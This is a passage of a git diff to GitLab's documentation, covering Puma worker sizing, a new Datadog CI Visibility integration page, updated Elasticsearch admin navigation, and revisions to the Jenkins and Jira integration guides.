your workload. Your workload is influenced by factors such as - but not limited to - how active your users are, how much automation you use, mirroring, and repository/change size. @@ -170,22 +173,71 @@ of GitLab Support or other GitLab engineers. ## Puma settings The recommended settings for Puma are determined by the infrastructure on which it's running. -Omnibus GitLab defaults to the recommended Puma settings. Regardless of installation method, you can -tune the Puma settings. +The GitLab Linux package defaults to the recommended Puma settings. Regardless of installation method, you can +tune the Puma settings: -If you're using Omnibus GitLab, see [Puma settings](https://docs.gitlab.com/omnibus/settings/puma.html) -for instructions on changing the Puma settings. If you're using the GitLab Helm chart, see the [`webservice` chart](https://docs.gitlab.com/charts/charts/gitlab/webservice/index.html). +- If you're using the GitLab Linux package, see [Puma settings](../administration/operations/puma.md) + for instructions on changing the Puma settings. +- If you're using the GitLab Helm chart, see the + [`webservice` chart](https://docs.gitlab.com/charts/charts/gitlab/webservice/index.html). ### Puma workers The recommended number of workers is calculated as the highest of the following: - `2` -- Number of CPU cores - 1 - -For example a node with 4 cores should be configured with 3 Puma workers. - -You can increase the number of Puma workers, providing enough CPU and memory capacity is available. +- A combination of CPU and memory resource availability (see how this is configured automatically for the [Linux package](https://gitlab.com/gitlab-org/omnibus-gitlab/-/blob/ef9facdc927e7389db6a5e0655414ba8318c7b8a/files/gitlab-cookbooks/gitlab/libraries/puma.rb#L31-46)). + +Take for example the following scenarios: + +- A node with 2 cores / 8 GB memory should be configured with **2 Puma workers**. + + Calculated as: + + ```plaintext + The highest number from + 2 + And + [ + the lowest number from + - number of cores: 2 + - memory limit: (8 - 1.5) = 6 + ] + ``` + + So, the highest from 2 and 2 is 2. + +- A node with 4 cores / 4 GB memory should be configured with **2 Puma workers**. + + ```plaintext + The highest number from + 2 + And + [ + the lowest number from + - number of cores: 4 + - memory limit: (4 - 1.5) = 2.5 + ] + ``` + + So, the highest from 2 and 2 is 2. + +- A node with 4 cores / 8 GB memory should be configured with **4 Puma workers**. + + ```plaintext + The highest number from + 2 + And + [ + the lowest number from + - number of cores: 4 + - memory limit: (8 - 1.5) = 6.5 + ] + ``` + + So, the highest from 2 and 4 is 4. + +You can increase the number of Puma workers, provided enough CPU and memory capacity is available. A higher number of Puma workers usually helps to reduce the response time of the application and increase the ability to handle parallel requests. You must perform testing to verify the optimal settings for your infrastructure. diff --git a/doc/integration/datadog.md b/doc/integration/datadog.md new file mode 100644 index 00000000000..38ff004a203 --- /dev/null +++ b/doc/integration/datadog.md @@ -0,0 +1,32 @@ +--- +stage: Create +group: Ecosystem +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Datadog integration **(FREE)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/270123) in GitLab 14.1 + +This integration allows sending CI/CD pipeline and job information to [Datadog](https://www.datadoghq.com/) for monitoring and troubleshooting of job failures and performance issues using the [CI Visibility](https://app.datadoghq.com/ci) product. + +You can find out more information on [Datadog's CI Visibility documentation site](https://docs.datadoghq.com/continuous_integration/). + +## How to configure it + +The integration is based on [Webhooks](../user/project/integrations/webhooks.md) and it only requires setup on GitLab. + +Configure the integration on a project or group by going to **Settings > Integrations > Datadog** for each project or group you want to instrument. You can also activate the integration for the entire GitLab instance. + +Fill in the integration configuration settings: + +- `Active` enables the integration. +- `Datadog site` specifies which [Datadog site](https://docs.datadoghq.com/getting_started/site/) to send data to. +- `API URL` (optional) allows overriding the API URL used for sending data directly, only used in advanced scenarios. +- `API key` specifies which API key to use when sending data. You can generate one in the [APIs tab](https://app.datadoghq.com/account/settings#api) of the Integrations section on Datadog. +- `Service` (optional) specifies which service name to attach to each span generated by the integration. Use this to differentiate between GitLab instances. +- `Env` (optional) specifies which environment (`env` tag) to attach to each span generated by the integration. Use this to differentiate between groups of GitLab instances (i.e. staging vs production). + +You can test the integration with the `Test settings` button. After it’s successful, click `Save changes` to finish the integration set up. + +Data sent by the integration will be available in the [CI Visibility](https://app.datadoghq.com/ci) section of your Datadog account. diff --git a/doc/integration/elasticsearch.md b/doc/integration/elasticsearch.md index aa82e15f1b1..23ca57cb8b8 100644 --- a/doc/integration/elasticsearch.md +++ b/doc/integration/elasticsearch.md @@ -26,6 +26,11 @@ and the advantage of the [special searches](../user/search/advanced_search.md). | GitLab Enterprise Edition 9.0 through 11.4 | Elasticsearch 5.1 through 5.5 | | GitLab Enterprise Edition 8.4 through 8.17 | Elasticsearch 2.4 with [Delete By Query Plugin](https://www.elastic.co/guide/en/elasticsearch/plugins/2.4/plugins-delete-by-query.html) installed | +The Elasticsearch Integration is designed to work with supported versions of +Elasticsearch and follows Elasticsearch's [End of Life Policy](https://www.elastic.co/support/eol). +When we change Elasticsearch supported versions in GitLab, we announce them in [deprecation notes](https://about.gitlab.com/handbook/marketing/blog/release-posts/#deprecations) in monthly release posts +before the actual removal. + ## System requirements Elasticsearch requires additional resources in excess of those documented in the @@ -186,7 +191,8 @@ instances](#indexing-large-instances) below. To enable Advanced Search, you need to have admin access to GitLab: -1. Navigate to **Admin Area**, then **Settings > Advanced Search**. +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Advanced Search**. NOTE: To see the Advanced Search section, you need an active GitLab Premium @@ -195,11 +201,10 @@ To enable Advanced Search, you need to have admin access to GitLab: 1. Configure the [Advanced Search settings](#advanced-search-configuration) for your Elasticsearch cluster. Do not enable **Search with Elasticsearch enabled** yet. -1. Now enable **Elasticsearch indexing** in **Admin Area > Settings > - Advanced Search** and click **Save changes**. This will create +1. Enable **Elasticsearch indexing** and select **Save changes**. This creates an empty index if one does not already exist. -1. Click **Index all projects**. -1. Click **Check progress** in the confirmation message to see the status of +1. Select **Index all projects**. +1. Select **Check progress** in the confirmation message to see the status of the background jobs. 1. Personal snippets need to be indexed using another Rake task: @@ -211,9 +216,7 @@ To enable Advanced Search, you need to have admin access to GitLab: bundle exec rake gitlab:elastic:index_snippets RAILS_ENV=production ``` -1. After the indexing has completed, enable **Search with Elasticsearch enabled** in - **Admin Area > Settings > Advanced Search** and click **Save - changes**. +1. After the indexing has completed, enable **Search with Elasticsearch enabled** and select **Save changes**. NOTE: When your Elasticsearch cluster is down while Elasticsearch is enabled, @@ -283,7 +286,8 @@ You can improve the language support for Chinese and Japanese languages by utili To enable language(s) support: 1. Install the desired plugin(s), please refer to [Elasticsearch documentation](https://www.elastic.co/guide/en/elasticsearch/plugins/7.9/installation.html) for plugins installation instructions. The plugin(s) must be installed on every node in the cluster, and each node must be restarted after installation. For a list of plugins, see the table later in this section. -1. Navigate to the **Admin Area**, then **Settings > Advanced Search**.. +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Advanced Search**. 1. Locate **Custom analyzers: language support**. 1. Enable plugin(s) support for **Indexing**. 1. Click **Save changes** for the changes to take effect. @@ -303,7 +307,8 @@ For guidance on what to install, see the following Elasticsearch language plugin To disable the Elasticsearch integration: -1. Navigate to the **Admin Area**, then **Settings > Advanced Search**. +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Advanced Search**. 1. Uncheck **Elasticsearch indexing** and **Search with Elasticsearch enabled**. 1. Click **Save changes** for the changes to take effect. 1. (Optional) Delete the existing indexes: @@ -334,7 +339,9 @@ index alias to it which becomes the new `primary` index. At the end, we resume t To trigger the reindexing process: 1. Sign in to your GitLab instance as an administrator. -1. Go to **Admin Area > Settings > Advanced Search > Elasticsearch zero-downtime reindexing**. +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Advanced Search**. +1. Expand **Elasticsearch zero-downtime reindexing**. 1. Select **Trigger cluster reindexing**. Reindexing can be a lengthy process depending on the size of your Elasticsearch cluster. @@ -349,7 +356,10 @@ While the reindexing is running, you will be able to follow its progress under t > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/55681) in GitLab 13.12. -The following reindex settings are available in **Admin Area > Settings > Advanced Search > Elasticsearch zero-downtime reindexing**: +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Advanced Search**. +1. Expand **Elasticsearch zero-downtime reindexing**, and you'll + find the following options: - [Slice multiplier](#slice-multiplier) - [Maximum running slices](#maximum-running-slices) @@ -394,7 +404,10 @@ Sometimes, you might want to abandon the unfinished reindex job and resume the i bundle exec rake gitlab:elastic:mark_reindex_failed RAILS_ENV=production ``` -1. Uncheck the "Pause Elasticsearch indexing" checkbox in **Admin Area > Settings > Advanced Search**. +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Advanced Search**. +1. Expand **Elasticsearch zero-downtime reindexing**. +1. Clear the **Pause Elasticsearch indexing** checkbox. ## Advanced Search migrations @@ -545,7 +558,7 @@ For basic guidance on choosing a cluster configuration you may refer to [Elastic - A good guideline is to ensure you keep the number of shards per node below 20 per GB heap it has configured. A node with a 30GB heap should therefore have a maximum of 600 shards, but the further below this limit you can keep it the better. This will generally help the cluster stay in good health. - Number of Elasticsearch shards: - Small shards result in small segments, which increases overhead. Aim to keep the average shard size between at least a few GB and a few tens of GB. - - Another consideration is the number of documents. To determine the number of shards to use, sum the numbers in the **Admin Area > Dashboard > Statistics** pane (the number of documents to be indexed), divide by 5 million, and add 5. For example: + - Another consideration is the number of documents. To determine the number of shards to use, sum the numbers in the **Menu >** **{admin}** **Admin > Dashboard > Statistics** pane (the number of documents to be indexed), divide by 5 million, and add 5. For example: - If you have fewer than about 2,000,000 documents, use the default of 5 shards - 10,000,000 documents: `10000000/5000000 + 5` = 7 shards - 100,000,000 documents: `100000000/5000000 + 5` = 25 shards @@ -622,7 +635,7 @@ Sidekiq processes](../administration/operations/extra_sidekiq_processes.md). ``` This enqueues a Sidekiq job for each project that needs to be indexed. - You can view the jobs in **Admin Area > Monitoring > Background Jobs > Queues Tab** + You can view the jobs in **Menu >** **{admin}** **Admin > Monitoring > Background Jobs > Queues Tab** and click `elastic_commit_indexer`, or you can query indexing status using a Rake task: ```shell @@ -725,7 +738,7 @@ Sidekiq processes](../administration/operations/extra_sidekiq_processes.md). ### Deleted documents -Whenever a change or deletion is made to an indexed GitLab object (a merge request description is changed, a file is deleted from the master branch in a repository, a project is deleted, etc), a document in the index is deleted. However, since these are "soft" deletes, the overall number of "deleted documents", and therefore wasted space, increases. Elasticsearch does intelligent merging of segments in order to remove these deleted documents. However, depending on the amount and type of activity in your GitLab installation, it's possible to see as much as 50% wasted space in the index. +Whenever a change or deletion is made to an indexed GitLab object (a merge request description is changed, a file is deleted from the default branch in a repository, a project is deleted, etc), a document in the index is deleted. However, since these are "soft" deletes, the overall number of "deleted documents", and therefore wasted space, increases. Elasticsearch does intelligent merging of segments in order to remove these deleted documents. However, depending on the amount and type of activity in your GitLab installation, it's possible to see as much as 50% wasted space in the index. In general, we recommend letting Elasticsearch merge and reclaim space automatically, with the default settings. From [Lucene's Handling of Deleted Documents](https://www.elastic.co/blog/lucenes-handling-of-deleted-documents "Lucene's Handling of Deleted Documents"), _"Overall, besides perhaps decreasing the maximum segment size, it is best to leave Lucene's defaults as-is and not fret too much about when deletes are reclaimed."_ diff --git a/doc/integration/github.md b/doc/integration/github.md index 4d8adfe42f1..7459691831c 100644 --- a/doc/integration/github.md +++ b/doc/integration/github.md @@ -22,7 +22,7 @@ your website could enable the covert redirect attack. ## Enabling GitHub OAuth -To enable the GitHub OmniAuth provider, you need an OAuth 2 Client ID and Client Secret from GitHub. To get these credentials, sign into GitHub and follow their procedure for [Creating an OAuth App](https://docs.github.com/en/developers/apps/creating-an-oauth-app). +To enable the GitHub OmniAuth provider, you need an OAuth 2 Client ID and Client Secret from GitHub. To get these credentials, sign into GitHub and follow their procedure for [Creating an OAuth App](https://docs.github.com/en/developers/apps/building-oauth-apps/creating-an-oauth-app). When you create an OAuth 2 app in GitHub, you need the following information: diff --git a/doc/integration/google_workspace_saml.md b/doc/integration/google_workspace_saml.md deleted file mode 100644 index a02e88cc33f..00000000000 --- a/doc/integration/google_workspace_saml.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'saml.md' -remove_date: '2021-06-15' ---- - -This document was moved to [another location](saml.md). - -<!-- This redirect file can be deleted after 2021-06-15>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/integration/jenkins.md b/doc/integration/jenkins.md index 60c9faf938d..b6d720d2714 100644 --- a/doc/integration/jenkins.md +++ b/doc/integration/jenkins.md @@ -18,7 +18,7 @@ To better understand the GitLab Jenkins integration, watch the following video: Use the Jenkins integration with GitLab when: -- You plan to migrate your CI from Jenkins to [GitLab CI/CD](../ci/README.md) in the future, but +- You plan to migrate your CI from Jenkins to [GitLab CI/CD](../ci/index.md) in the future, but need an interim solution. - You're invested in [Jenkins Plugins](https://plugins.jenkins.io/) and choose to keep using Jenkins to build your apps. @@ -65,7 +65,7 @@ Grant a GitLab user access to the select GitLab projects. 1. Grant the user permission to the GitLab projects. If you're integrating Jenkins with many GitLab projects, consider granting the user global - Administrator permission. Otherwise, add the user to each project, and grant Developer permission. + Administrator permission. Otherwise, add the user to each project, and grant the Developer role. ## Configure GitLab API access @@ -137,13 +137,16 @@ Set up the Jenkins project you intend to run your build on. } ``` + For more Jenkins Pipeline script examples, go to the [Jenkins GitLab plugin repository on GitHub](https://github.com/jenkinsci/gitlab-plugin#scripted-pipeline-jobs). + ## Configure the GitLab project Configure the GitLab integration with Jenkins in one of the following ways. ### Recommended Jenkins integration -GitLab recommends this approach for Jenkins integrations. +GitLab recommends this approach for Jenkins integrations because it is easier to configure +than the [webhook integration](#webhook-integration). 1. Create a new GitLab project or choose an existing one. 1. Go to **Settings > Integrations**, then select **Jenkins CI**. @@ -217,3 +220,16 @@ If you don't find the errors above, but do find *duplicate* entries like below ( 2019-10-25_04:22:41.25630 2019-10-25T04:22:41.256Z 1584 TID-ovowh4tek WebHookWorker JID-941fb7f40b69dff3d833c99b INFO: start 2019-10-25_04:22:41.25630 2019-10-25T04:22:41.256Z 1584 TID-ovowh4tek WebHookWorker JID-941fb7f40b69dff3d833c99b INFO: start ``` + +### Enable job logs in Jenkins + +When troubleshooting an integration issue, it is useful to enable job logs in Jenkins to see more details about what is happening under the hood. +To enable job logs in Jenkins: + +1. Go to **Dashboard > Manage Jenkins > System Log**. +1. Select **Add new log recorder**. +1. Enter a name for the log recorder. +1. On the next screen, select **Add** and enter `org.jenkinsci.plugins.workflow.job` in the text field. +1. Make sure that the Log Level is **All** and select **Save**. + +Now, after you run a build, you can go to the loggers page (**Dashboard > Manage Jenkins > System Log**), select your logger, and check the logs. diff --git a/doc/integration/jira/connect-app.md b/doc/integration/jira/connect-app.md index a080d513afa..fcee3f7a637 100644 --- a/doc/integration/jira/connect-app.md +++ b/doc/integration/jira/connect-app.md @@ -4,21 +4,24 @@ group: Ecosystem info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# GitLab.com for Jira Cloud app **(FREE SAAS)** +# GitLab.com for Jira Cloud app **(FREE)** + +## GitLab.com for Jira Cloud app **(FREE SAAS)** You can integrate GitLab.com and Jira Cloud using the [GitLab.com for Jira Cloud](https://marketplace.atlassian.com/apps/1221011/gitlab-com-for-jira-cloud) -app in the Atlassian Marketplace. The user configuring GitLab.com for Jira Cloud must have +app in the Atlassian Marketplace. The user configuring GitLab.com for Jira Cloud app must have [Maintainer](../../user/permissions.md) permissions in the GitLab.com namespace. This integration method supports [smart commits](dvcs.md#smart-commits). This method is recommended when using GitLab.com and Jira Cloud because data is synchronized in real-time. The DVCS connector updates data only once per hour. -If you are not using both of these environments, use the [Jira DVCS Connector](dvcs.md) method. +If you are not using both of these environments, use the [Jira DVCS Connector](dvcs.md) method or +[steps to install GitLab.com for Jira Cloud app for self-managed instances](#install-the-gitlabcom-for-jira-cloud-app-for-self-managed-instances). <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -For a walkthrough of the integration with GitLab.com for Jira Cloud, watch +For a walkthrough of the integration with GitLab.com for Jira Cloud app, watch [Configure GitLab.com Jira Could Integration using Marketplace App](https://youtu.be/SwR-g1s1zTo) on YouTube. 1. Go to **Jira Settings > Apps > Find new apps**, then search for GitLab. @@ -52,10 +55,10 @@ After a namespace is added: Support for syncing past branch and commit data [is planned](https://gitlab.com/gitlab-org/gitlab/-/issues/263240). -## Install the GitLab.com for Jira Cloud application for self-managed instances **(FREE SELF)** +## Install the GitLab.com for Jira Cloud app for self-managed instances **(FREE SELF)** If your GitLab instance is self-managed, you must follow some -extra steps to install the GitLab.com for Jira Cloud application. +extra steps to install the GitLab.com for Jira Cloud app. Each Jira Cloud application must be installed from a single location. Jira fetches a [manifest file](https://developer.atlassian.com/cloud/jira/platform/connect-app-descriptor/) @@ -121,9 +124,9 @@ for details. NOTE: DVCS means distributed version control system. -## Troubleshooting GitLab.com for Jira Cloud +## Troubleshooting GitLab.com for Jira Cloud app -The GitLab.com for Jira Cloud app uses an iframe to add namespaces on the settings page. Some browsers block cross-site cookies. This can lead to a message saying that the user needs to log in on GitLab.com even though the user is already logged in. +The GitLab.com for Jira Cloud app uses an iframe to add namespaces on the settings page. Some browsers block cross-site cookies, which can lead to a message saying that the user needs to log in on GitLab.com even though the user is already logged in. > "You need to sign in or sign up before continuing." diff --git a/doc/integration/jira/development_panel.md b/doc/integration/jira/development_panel.md index 3aba2e3b3a0..9057267d55e 100644 --- a/doc/integration/jira/development_panel.md +++ b/doc/integration/jira/development_panel.md @@ -31,11 +31,6 @@ This integration connects all GitLab projects to projects in the Jira instance i including the projects in its subgroups. - A personal namespace: Connects the projects in that personal namespace to Jira. -This differs from the [Jira integration](index.md), -where the mapping is between one GitLab project and the entire Jira instance. -You can install both integrations to take advantage of both sets of features. -A [feature comparison](index.md#direct-feature-comparison) is available. - ## Use the integration After the integration is [set up on GitLab and Jira](#configure-the-integration), you can: @@ -44,7 +39,8 @@ After the integration is [set up on GitLab and Jira](#configure-the-integration) commit messages, and merge request titles. - See the linked branches, commits, and merge requests in Jira issues: -Merge requests are called "pull requests" in Jira issues. +At this time, merge requests are called "pull requests" in Jira issues. +This name may change in a future Jira release. Select the links to see your GitLab repository data. @@ -72,13 +68,13 @@ To simplify administration, we recommend that a GitLab group maintainer or group | Jira usage | GitLab.com customers need | GitLab self-managed customers need | |------------|---------------------------|------------------------------------| -| [Atlassian cloud](https://www.atlassian.com/cloud) | The [GitLab.com for Jira Cloud](https://marketplace.atlassian.com/apps/1221011/gitlab-com-for-jira-cloud?hosting=cloud&tab=overview) application installed from the [Atlassian Marketplace](https://marketplace.atlassian.com). This offers real-time sync between GitLab and Jira. | The [GitLab.com for Jira Cloud](https://marketplace.atlassian.com/apps/1221011/gitlab-com-for-jira-cloud?hosting=cloud&tab=overview), using a workaround process. See the documentation for [installing the GitLab Jira Cloud application for self-managed instances](connect-app.md#install-the-gitlabcom-for-jira-cloud-application-for-self-managed-instances) for more information. | +| [Atlassian cloud](https://www.atlassian.com/cloud) | The [GitLab.com for Jira Cloud](https://marketplace.atlassian.com/apps/1221011/gitlab-com-for-jira-cloud?hosting=cloud&tab=overview) application installed from the [Atlassian Marketplace](https://marketplace.atlassian.com). This offers real-time sync between GitLab and Jira. | The [GitLab.com for Jira Cloud](https://marketplace.atlassian.com/apps/1221011/gitlab-com-for-jira-cloud?hosting=cloud&tab=overview), using a workaround process. See the documentation for [installing the GitLab Jira Cloud application for self-managed instances](connect-app.md#install-the-gitlabcom-for-jira-cloud-app-for-self-managed-instances) for more information. | | Your own server | The Jira DVCS (distributed version control system) connector. This syncs data hourly. | The [Jira DVCS Connector](dvcs.md). | Each GitLab project can be configured to connect to an entire Jira instance. That means after configuration, one GitLab project can interact with all Jira projects in that instance. For: -- The [view Jira issues](issues.md#view-jira-issues) feature, you must associate a GitLab project with a +- The [view Jira issues](issues.md#view-jira-issues) feature **(PREMIUM)**, you must associate a GitLab project with a specific Jira project. - Other features, you do not have to explicitly associate a GitLab project with any single Jira project. @@ -86,16 +82,16 @@ configuration, one GitLab project can interact with all Jira projects in that in If you have a single Jira instance, you can pre-fill the settings. For more information, read the documentation for [central administration of project integrations](../../user/admin_area/settings/project_integration_management.md). -To enable the Jira service in GitLab, you must: +To enable the integration in GitLab, you must: -1. [Configure the project in Jira](dvcs.md#configure-jira-for-dvcs). +1. [Configure the project in Jira](index.md#jira-integration). The supported Jira versions are `v6.x`, `v7.x`, and `v8.x`. 1. [Enter the correct values in GitLab](#configure-gitlab). ### Configure GitLab To enable the integration in your GitLab project, after you -[configure your Jira project](dvcs.md#configure-jira-for-dvcs): +[configure your Jira project](index.md#jira-integration): 1. Ensure your GitLab installation does not use a relative URL, as described in [Limitations](#limitations). @@ -114,12 +110,14 @@ To enable the integration in your GitLab project, after you this GitLab project, such as `https://jira.example.com`. - **Jira API URL**: The base URL to the Jira instance API, such as `https://jira-api.example.com`. Defaults to the **Web URL** value if not set. Leave blank if using **Jira on Atlassian cloud**. - - **Username or Email**: Created when you [configured Jira](dvcs.md#configure-jira-for-dvcs). + - **Username or Email**: For **Jira Server**, use `username`. For **Jira on Atlassian cloud**, use `email`. - - **Password/API token**: Created when you [configured Jira](dvcs.md#configure-jira-for-dvcs). + See [authentication in Jira](index.md#authentication-in-jira). + - **Password/API token**: Use `password` for **Jira Server** or `API token` for **Jira on Atlassian cloud**. -1. To enable users to view Jira issues inside the GitLab project, select **Enable Jira issues** and - enter a Jira project key. **(PREMIUM)** + See [authentication in Jira](index.md#authentication-in-jira). +1. To enable users to view Jira issues inside the GitLab project **(PREMIUM)**, select **Enable Jira issues** and + enter a Jira project key. You can display issues only from a single Jira project in a given GitLab project. @@ -127,7 +125,7 @@ To enable the integration in your GitLab project, after you If you enable Jira issues with this setting, all users with access to this GitLab project can view all issues from the specified Jira project. -1. To enable issue creation for vulnerabilities, select **Enable Jira issues creation from vulnerabilities**. +1. To enable issue creation for vulnerabilities **(ULTIMATE)**, select **Enable Jira issues creation from vulnerabilities**. 1. Select the **Jira issue type**. If the dropdown is empty, select refresh (**{retry}**) and try again. 1. To verify the Jira connection is working, select **Test settings**. 1. Select **Save changes**. diff --git a/doc/integration/jira/dvcs.md b/doc/integration/jira/dvcs.md index dc23765337b..d69243e50a6 100644 --- a/doc/integration/jira/dvcs.md +++ b/doc/integration/jira/dvcs.md @@ -7,9 +7,9 @@ info: To determine the technical writer assigned to the Stage/Group associated w # Jira DVCS connector **(FREE)** Use the Jira DVCS (distributed version control system) connector if you self-host -either your Jira instance or your GitLab instance, and you want to sync information -between them. If you use Jira Cloud and GitLab.com, you should use the -[GitLab for Jira app](connect-app.md) unless you specifically need the DVCS connector. +your Jira instance, and you want to sync information +between GitLab and Jira. If you use Jira Cloud and GitLab.com, you should use the +[GitLab.com for Jira Cloud app](connect-app.md) unless you specifically need the DVCS connector. When you configure the Jira DVCS connector, make sure your GitLab and Jira instances are accessible. @@ -67,8 +67,9 @@ your integration. 1. In GitLab, [create a user](../../user/profile/account/create_accounts.md) for Jira to use to connect to GitLab. For Jira to access all projects, - a user with [Administrator](../../user/permissions.md) permissions must - create the user. + a user with [administrator](../../user/permissions.md) permissions must + create the user with administrator permissions. +1. Sign in as the `jira` user. 1. In the top right corner, click the account's avatar, and select **Edit profile**. 1. In the left sidebar, select **Applications**. 1. In the **Name** field, enter a descriptive name for the integration, such as `Jira`. @@ -77,6 +78,7 @@ your integration. - *For GitLab versions 13.0 and later* **and** *Jira versions 8.14 and later,* use the generated `Redirect URL` from [Linking GitLab accounts with Jira](https://confluence.atlassian.com/adminjiraserver/linking-gitlab-accounts-1027142272.html). + - *For GitLab versions 13.0 and later* **and** *Jira Cloud,* use `https://<gitlab.example.com>/login/oauth/callback`. - *For GitLab versions 11.3 and later,* use `https://<gitlab.example.com>/login/oauth/callback`. If you use GitLab.com, the URL is `https://gitlab.com/login/oauth/callback`. - *For GitLab versions 11.2 and earlier,* use @@ -89,9 +91,6 @@ your integration. ## Configure Jira for DVCS -If you use Jira Cloud and GitLab.com, use the [GitLab for Jira app](connect-app.md) -unless you specifically need the DVCS Connector. - Configure this connection when you want to import all GitLab commits and branches, for the groups you specify, into Jira. This import takes a few minutes and, after it completes, refreshes every 60 minutes: diff --git a/doc/integration/jira/index.md b/doc/integration/jira/index.md index 2646a6c5e2e..a85ffdd1feb 100644 --- a/doc/integration/jira/index.md +++ b/doc/integration/jira/index.md @@ -7,28 +7,28 @@ info: To determine the technical writer assigned to the Stage/Group associated w # Jira integrations **(FREE)** If your organization uses [Jira](https://www.atlassian.com/software/jira) issues, -you can [migrate](../../user/project/import/jira.md) your issues from Jira and work +you can [migrate your issues from Jira](../../user/project/import/jira.md) **(PREMIUM)** and work exclusively in GitLab. However, if you'd like to continue to use Jira, you can integrate it with GitLab. GitLab offers two types of Jira integrations, and you -can use one or both depending on the capabilities you need. +can use one or both depending on the capabilities you need. It is recommended that you enable both. -## Compare Jira integrations +## Compare integrations After you set up one or both of these integrations, you can cross-reference activity in your GitLab project with any of your projects in Jira. -<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -For an overview, see [Agile Management - GitLab-Jira Basic Integration](https://www.youtube.com/watch?v=fWvwkx5_00E&feature=youtu.be). +### Jira integration -### Per-project Jira integration +This integration connects one or more GitLab project to a Jira instance. The Jira instance +can be hosted by you or in [Atlassian cloud](https://www.atlassian.com/cloud). +The supported Jira versions are `v6.x`, `v7.x`, and `v8.x`. -This integration connects a single GitLab project to a Jira instance. The Jira instance -can be hosted by you or in [Atlassian cloud](https://www.atlassian.com/cloud): +<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> +For an overview, see [Agile Management - GitLab-Jira Basic Integration](https://www.youtube.com/watch?v=fWvwkx5_00E&feature=youtu.be). -- *If your installation uses Jira Cloud,* use the - [GitLab for Jira app](connect-app.md). -- *If either your Jira or GitLab installation is self-managed,* use the - [Jira DVCS Connector](dvcs.md). +To set up the integration, [configure the project settings](development_panel.md#configure-gitlab) in GitLab. +You can also configure these settings at a [group level](../../user/admin_area/settings/project_integration_management.md#manage-group-level-default-settings-for-a-project-integration), +and for self-managed GitLab, at an [instance level](../../user/admin_area/settings/project_integration_management.md#manage-instance-level-default-settings-for-a-project-integration). ### Jira development panel integration @@ -37,6 +37,13 @@ connects all GitLab projects under a group or personal namespace. When configure relevant GitLab information, including related branches, commits, and merge requests, displays in the [development panel](https://support.atlassian.com/jira-software-cloud/docs/view-development-information-for-an-issue/). +To set up the Jira development panel integration: + +- *If your installation uses Jira Cloud,* use the + [GitLab for Jira app](connect-app.md). +- *If either your Jira or GitLab installation is self-managed,* use the + [Jira DVCS Connector](dvcs.md). + ### Direct feature comparison | Capability | Jira integration | Jira Development panel integration | @@ -48,7 +55,7 @@ displays in the [development panel](https://support.atlassian.com/jira-software- | Add Jira time tracking to an issue. | No. | Yes. Time can be specified using Jira Smart Commits. | | Use a Git commit or merge request to transition or close a Jira issue. | Yes. Only a single transition type, typically configured to close the issue by setting it to Done. | Yes. Transition to any state using Jira Smart Commits. | | Display a list of Jira issues. | Yes. **(PREMIUM)** | No. | -| Create a Jira issue from a vulnerability or finding. **(ULTIMATE)** | Yes. | No. | +| Create a Jira issue from a vulnerability or finding. | Yes. **(ULTIMATE)** | No. | ## Authentication in Jira @@ -64,10 +71,10 @@ The process for configuring Jira depends on whether you host Jira on your own se ## Privacy considerations -If you integrate a private GitLab project with Jira using the [**Per-project Jira integration**](#per-project-jira-integration), +If you integrate a private GitLab project with Jira using the [**Jira integration**](#jira-integration), actions in GitLab issues and merge requests linked to a Jira issue leak information about the private project to non-administrator Jira users. If your installation uses Jira Cloud, -you can use the [GitLab for Jira app](connect-app.md) to avoid this risk. +you can use the [GitLab.com for Jira Cloud app](connect-app.md) to avoid this risk. ## Troubleshooting @@ -96,3 +103,8 @@ which may lead to a `401 unauthorized` error when testing your Jira integration. If CAPTCHA has been triggered, you can't use Jira's REST API to authenticate with the Jira site. You need to log in to your Jira instance and complete the CAPTCHA. + +## Third-party Jira integrations + +Developers have built several third-party Jira integrations for GitLab that are +listed on the [Atlassian Marketplace](https://marketplace.atlassian.com/search?product=jira&query=gitlab). diff --git a/doc/integration/jira/issues.md b/doc/integration/jira/issues.md index 91311f85310..34ca5481b85 100644 --- a/doc/integration/jira/issues.md +++ b/doc/integration/jira/issues.md @@ -6,7 +6,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w # Jira integration issue management **(FREE)** -Integrating issue management with Jira requires you to [configure Jira](development_panel.md#configure-the-integration) +Integrating issue management with Jira requires you to [configure Jira](index.md#jira-integration) and [enable the Jira service](development_panel.md#configure-gitlab) in GitLab. After you configure and enable the integration, you can reference and close Jira issues by mentioning the Jira ID in GitLab commits and merge requests. @@ -49,13 +49,10 @@ You can [disable comments](#disable-comments-on-jira-issues) on issues. > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/280766) in [GitLab Ultimate](https://about.gitlab.com/pricing/) 13.12 behind a feature flag, disabled by default. > - [Deployed behind a feature flag](../../user/feature_flags.md), disabled by default. -> - Disabled on GitLab.com. -> - Not recommended for production use. -> - To use in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-the-ability-to-require-an-associated-jira-issue-on-merge-requests). **(ULTIMATE SELF)** - -This in-development feature might not be available for your use. There can be -[risks when enabling features still in development](../../user/application_security/index.md#security-approvals-in-merge-requests). -Refer to this feature's version history for more details. +> - [Enabled by default](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/61722) in GitLab 14.1. +> - Enabled on GitLab.com. +> - Recommended for production use. +> - For GitLab self-managed instances, GitLab administrators can opt to [disable 